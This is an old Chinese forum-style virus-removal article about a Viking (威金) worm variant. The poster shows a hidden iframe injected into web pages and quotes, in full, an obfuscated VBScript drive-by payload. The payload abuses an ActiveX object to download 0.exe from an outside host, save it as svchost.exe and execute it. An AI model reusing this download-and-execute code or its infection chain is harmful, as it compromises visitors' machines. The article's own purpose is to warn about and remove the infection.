dedecms织梦内容管理系统  
 
首页 | 方舟产品 | 系统优化 | 硬件系统 | 软件系统 | 网络系统 | 无盘网络 | 软件下载 | 杀毒防黑 | 专题 | 会员中心 | 方舟论坛
  当前位置:方舟系统站>杀毒防黑>病毒防治>文章内容
9Sy.exe,0[1].exe,cmd.exe 威金最新变种
来源:天下网盟 作者: 发布时间:2007-04-04  


网吧这几天老是中毒`  但找不着原因` 只要是一开IE就会自动下载两个病毒文件

进程是 0[1].exe 和 cmd.exe  

今天无意打开百度的首页  发现每个网页都被插如了一段

<iframe src="http://w.77276.com/0.htm" width="0" height="0" frameborder="0"></iframe><html>ype content="text/html; charset=gb2312">

这一段是被修改的代码   正常的代码

<html><head><title>百度MP3——全球最大中文MP3搜索引擎  </title>
<meta http-equiv=Content-Type content="text/html; charset=gb2312">



我试着打开了 http://w.77276.com/0.htm  这个页面 里边什么也没有`

查看了原文件 内容是

<HTML>

<BODY style='CURSOR: url(http://w.77276.com/muxiao2.jpg)'>

</BODY></HTML>
<iframe src="http://w.77276.com/1.htm" width="0" height="0" frameborder="0"></iframe>

我又打开 http://w.77276.com/muxiao2.jpg  来看` 不过图片显示不出来  

那这么说` 肯定就是个图片木马了 ...

我又打开了  http://w.77276.com/1.htm  看代码   如下

<SCRIPT language=VBScript>
on error resume next
****ie = "http://d.77276.com/0.exe"
fname1="svchost.exe"
fname2="svchost.vbs"
Set df = document.createElement("o"&"b"&"j"&"e"&"c"&"t")
df.setAttribute "c"&"l"&"a"&"s"&"s"&"i"&"d", "c"&"l"&"s"&"id:"&"B"&"D"&"96"&"C5"&"56"&"-65"&"A3"&"-11"&"D0"&"-98"&"3A"&"-00"&"C04"&"FC2"&"9E"&"36"
str="Mic"&"ro"&"so"&"ft."&"X"&"M"&"L"&"HT"&"TP"
Set x = df.CreateObject(str,"")
a1="A"&"d"&"o"
a2="d"&"b."
a3="S"&"tr"
a4="e"&"am"  
str5="A"&"d"&"o"&"d"&"b."&"S"&"tr"&"e"&"am"
set S = df.createobject(str5,"")
S.type = 1
str6="G"&"E"&"T"
x.Open str6, ****ie, False
x.Send
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)  
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
fname2= F.BuildPath(tmp,fname2)
set ts = F.OpenTextFile(fname2, 2, True)
ts.WriteLine "Set Shell = CreateObject(""Sh""&""ell""&"".App""&""lic""&""at""&""ion"")"
sql="Shell.ShellExecute"""+fname1+""","""","""",""o""&""p""&""e""&""n"",0"
ts.writeLine sql
ts.close
if F.FileExists(fname1)=true then
if F.FileExists(fname2)=true then
d3="She"&"ll."&"App"&"li"&"ca"&"tion"
set Q = df.createobject(d3,"")
dc="o"&"p"&"e"&"n"
Q.ShellExecute fname2,"","",dc,0
end if
End if
</SCRIPT>

看看这句  

****ie = "http://d.77276.com/0.exe"
fname1="svchost.exe"
fname2="svchost.vbs"

好象是下载一个 0.exe吧`  然后还有 svchost.exe  svchost.vbs

下边的没看懂` 不知道什么意思`...

我试着访问这两个站 可都访问不了 ...

http://w.77276.com/

http://d.77276.com/

这是个什么域名哦`  看不懂....

看来是修改了我的IE?  不管开什么站` 提前植入一段代码 ....

后来演变成logo_.exe    和 9Sy.exe

若对系统操作不熟练,无法实施手工清除,可以下载方舟广谱病毒疫苗,运行arksafe1.bat后,按1键即可清除。若此病毒变种,可以按9在线升级病毒库,若病毒库也不没有此病毒名,可以参考方舟广谱病毒疫苗中的说明readme.txt,自定义加入病毒名。并给本站留言,我们将及时升级病毒包。

方舟广谱病毒疫苗下载地址:/view-398.html



 
 
[收藏] [推荐] [评论(1条)] [返回顶部] [打印本页] [关闭窗口]  
用户名: 新注册) 密码: 匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·alg.exe病毒的清除
·upxdnd.dll病毒的清除
·wuauclt.exe病毒清除
·cmd.exe病毒的清除方法
·iexplore.exe专杀清除方法
·mppds.dll病毒专杀
·穿透还原病毒变种(userinit.exe
·rundl132.exe logo1_.exe rundll
·shualai.exe病毒文件清除
·进程中出现多个iexplore进程病毒
·wsctf.exe和EXPLORER.EXE病毒的
·IGM.exe病毒的清除
  相关文章
·ARP病毒攻击分析与防范
·威金最新变种
·方舟广谱病毒疫苗升级为v1.6
·QQ接视频就死机
·mppds.exe,cmdbcs.exe,winform.d
·wsttrs.exe病毒文件的清除
·10分钟解决arp2007,没有双绑
·升级方舟广谱疫苗彻底杜绝因arp2
·Death.exe 死亡之吻病毒清除
·“ANI光标漏洞”艾妮专杀
·ANI“艾妮”病毒分析
·硬盘和内存中的病毒清除方法
  主题推广
方舟网络 版权所有|关于本站|隐私保护|